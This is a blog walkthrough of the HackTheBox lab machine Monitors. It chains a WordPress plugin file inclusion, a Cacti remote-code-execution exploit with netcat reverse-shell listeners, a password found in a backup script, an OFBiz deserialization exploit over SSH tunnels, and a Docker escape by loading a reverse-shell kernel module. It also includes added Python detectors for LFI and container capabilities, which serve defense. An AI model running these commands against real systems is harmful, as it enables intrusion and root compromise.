NepCodeX

Byte Musings: Where Tech Meets Curiosity


Monitors Walkthrough – Hackthebox – Writeup


Monitors is an active machine from Hackthebox. So, unless you are extremely desperate to capture the flag, don’t proceed to the walkthrough. Also, I will try to keep the walkthrough as short as possible.

Note: Writing public writeups for active machines is against the rules of HTB. Otherwise, I could have protected this blog post with the root flag. Also, I couldn’t find a good content locker for WordPress that allows a custom message, so I couldn’t password-protect this post using other methods like the root hash, the contents of a root-only-readable file, etc.

Walkthrough of Monitors from hackthebox

Firstly, let’s remove the default route added by the VPN server.

sudo route del -net default gw 10.10.14.1 netmask 0.0.0.0 dev tun0

Nmap scan

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.238 

Enumerate web server

From the nmap results, we have an HTTP server to enumerate.


Direct access by IP isn’t available. So, I added monitors.htb to the /etc/hosts file.


Upon opening the site by host name, we get a WordPress website.


Hence, I used wpscan to look for vulnerable plugins.

wpscan --api-token $WPSCAN_KEY --url http://monitors.htb/ --plugins-detection mixed -e -o wpscan.log
cat wpscan.log

We got an unauthenticated file inclusion vulnerability in the WP Spritz plugin. Thus, I opened the links provided and also started the Burp Suite proxy to move further. Then, I sent the request to Intruder and Repeater.


As we can see, the LFI worked. Since the plugin uses the file_get_contents function, the file is only read back to us, so we cannot execute remote PHP code through it. So, I decided to get credentials from the machine instead and looked for the WordPress configuration file (wp-config.php).
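From the defender’s side, an LFI like the one above leaves a clear trail in the web server’s access log: traversal sequences (often percent-encoded, sometimes twice) and sensitive file names in a query parameter. The following detector is an added example, not code from the post or the plugin; the log lines, plugin path and parameter name are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (not taken from the target); the plugin
# path and the "url" parameter name are placeholders.
SAMPLE_LOG = """\
10.10.14.60 - - [10/May/2021:10:01:02 +0000] "GET /wp-content/plugins/example-plugin/filter.php?url=../../../wp-config.php HTTP/1.1" 200 3121
10.10.14.60 - - [10/May/2021:10:01:05 +0000] "GET /wp-content/plugins/example-plugin/filter.php?url=..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1502
10.10.14.60 - - [10/May/2021:10:01:09 +0000] "GET /wp-content/plugins/example-plugin/filter.php?url=%252e%252e%252f%252e%252e%252fetc%252fapache2%252fsites-enabled%252f000-default.conf HTTP/1.1" 200 880
10.10.14.61 - - [10/May/2021:10:02:00 +0000] "GET /wp-content/plugins/example-plugin/filter.php?url=https://example.org/article HTTP/1.1" 200 4000
10.10.14.61 - - [10/May/2021:10:02:30 +0000] "GET /index.php HTTP/1.1" 200 12000
"""

# Common-log-format prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')

# Files an LFI probe typically reads (the writeup pulls wp-config.php and the
# Apache site config); extend this list for your own environment.
SENSITIVE = ("wp-config.php", "/etc/passwd", "/etc/shadow", "sites-enabled", "sites-available", "/proc/self")

def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so double-encoded traversal is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_target(target):
    """Return the reasons a request target looks like file-inclusion probing."""
    reasons = []
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for raw in values:
            v = fully_decode(raw)  # parse_qs already decoded one layer
            if "../" in v or "..\\" in v:
                reasons.append(f"traversal in {name}")
            if any(s in v.lower() for s in SENSITIVE):
                reasons.append(f"sensitive path in {name}")
    return reasons

def scan_log(text):
    """Return (client ip, status, reasons) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (reasons := classify_target(m["target"])):
            hits.append((m["ip"], int(m["status"]), reasons))
    return hits
```

A 200 status on a flagged request (as in the first three constructed lines) means the read most likely succeeded and the exposed file should be treated as compromised.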


I noted down the MySQL username and password. I also tried that password to log in as the WordPress admin and to SSH in as marcus, but neither worked. Hence, I decided to check the Apache configuration.

Reference: https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/file-inclusion/lfi-linux-list.md

I fuzzed with the list above and found that the default Apache site configuration file contains a comment mentioning another host name.


Hence, I added that host name to my hosts file.


Using admin and the password I found earlier in the wp-config.php file gave me access to the application on that host.


The version of the service is 1.2.12, which has an authenticated remote code execution exploit.

Reference: https://www.exploit-db.com/exploits/49810

nc -nlvp 4444

# On another tab
python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p <password> --lhost 10.10.14.60 --lport 4444

Finally, I got the foothold.

Get user’s shell

The first thing you want to do is make the shell interactive; otherwise, you will regret it later. I looked around manually but didn’t find anything, so I decided to download Linux enumeration scripts like linpeas, LinEnum, pspy, etc. However, neither wget nor curl is installed on the target. Luckily, we have netcat on the machine. Hence, I listened as follows on my local machine.

nc -nlvp 5555 < linpeas.sh 

On the target, I did the following.

cd /tmp
nc 10.10.14.60 5555 > linpeas.sh

I repeated the same for the other binaries and ran the scripts. However, they didn’t give me anything. Then, I searched for all files owned by other users and didn’t find anything either. However, when I looked at marcus’s home directory, there is a directory .backup with unusual permissions. So, I searched for the word marcus in files under directories that don’t hold binaries.

grep 'marcus' /etc -R 2>/dev/null

So, I looked at the content of the file.

cat /home/marcus/.backup/backup.sh

I got a password that gave me SSH access as the user marcus.

Get root access

There is a note that refers to Docker. So, I listed the listening ports.


Hence, I tunneled the port over SSH (forwarding local 8443 to the target’s 8443, and reverse-forwarding 4444 and 8080 for the callbacks).

ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 [email protected]

That version of Apache OFBiz has an exploit related to deserialization.

https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/


Next, I used Python to spawn another reverse shell back to my local machine, which allowed me to make the shell more interactive using stty.

Now, we are inside the Docker container. Next, we have to break out from the container to the host.

capsh --print

The capability cap_sys_module allows loading kernel modules into the host kernel, which lets us break out of the container.

Reference: https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
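The same check from the hardening side: decode a container’s effective capability mask (the CapEff line of /proc/self/status, which is what capsh --print reads) and report anything beyond Docker’s default set, flagging capabilities that by themselves give a path to the host. This is an added example, not code from the post or the referenced guide; the status excerpt is constructed, and the breakout list is this reviewer’s own selection.

```python
# Constructed /proc/self/status excerpt as it would look inside a container
# started with CAP_SYS_MODULE added to Docker's default set (not captured
# from the target).
SAMPLE_STATUS = """\
Name:\tsh
Uid:\t0\t0\t0\t0
CapInh:\t0000000000000000
CapPrm:\t00000000a80525fb
CapEff:\t00000000a80525fb
CapBnd:\t00000000a80525fb
CapAmb:\t0000000000000000
"""

# Linux capability names by bit number (include/uapi/linux/capability.h order).
CAP_NAMES = ("chown dac_override dac_read_search fowner fsetid kill setgid setuid "
             "setpcap linux_immutable net_bind_service net_broadcast net_admin "
             "net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace "
             "sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time "
             "sys_tty_config mknod lease audit_write audit_control setfcap "
             "mac_override mac_admin syslog wake_alarm block_suspend audit_read "
             "perfmon bpf checkpoint_restore").split()

# Docker's default capability set, and (this reviewer's own list, an assumption)
# the capabilities that on their own give a container-to-host escape path.
DOCKER_DEFAULT = "00000000a80425fb"
BREAKOUT_CAPS = {"cap_sys_module", "cap_sys_admin", "cap_sys_ptrace",
                 "cap_sys_rawio", "cap_dac_read_search"}

def decode_caps(hex_mask):
    """Turn a CapEff-style hex bitmask into a set of cap_* names."""
    mask = int(hex_mask, 16)
    return {f"cap_{name}" for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1}

def cap_eff(status_text):
    """Extract the effective capability mask from /proc/<pid>/status text."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split()[1]
    raise ValueError("CapEff line not found")

def audit(status_text):
    """Report caps beyond Docker's default and which of them enable a breakout."""
    eff = decode_caps(cap_eff(status_text))
    extra = sorted(eff - decode_caps(DOCKER_DEFAULT))
    risky = sorted(eff & BREAKOUT_CAPS)
    return {"extra_over_default": extra, "breakout_capable": risky}
```

Run audit() on the contents of /proc/self/status from inside the container; anything under breakout_capable should be removed from the container’s run configuration (docker run --cap-drop) unless the workload truly needs it.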

Following the guide, I copied the source code of the reverse shell kernel module. I changed the IP and port so that I would listen on the host. For that, I first copied the code to my local machine, edited it, and then copied it to the container’s ‘/’ path.


Then, I created the Makefile.


Then, I made the kernel module.

make

It didn’t work. So, I copied the two files to ‘/’ of the container. Then, I added the gcc library directory to the PATH.

mv reverse-shell.c /
mv Makefile /
cd /
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/8/
make clean
make

It succeeded, and I could see some new files in the directory. Then, I listened on port 4445 of the host machine via the SSH login.

nc -nlvp 4445

Lastly, I loaded the module inside the Docker container.

insmod reverse-shell.ko

This might not work because you might be working in a shared environment. So, reset your machine, repeat the steps, and voilà.


I got the root shell from the monitors host.


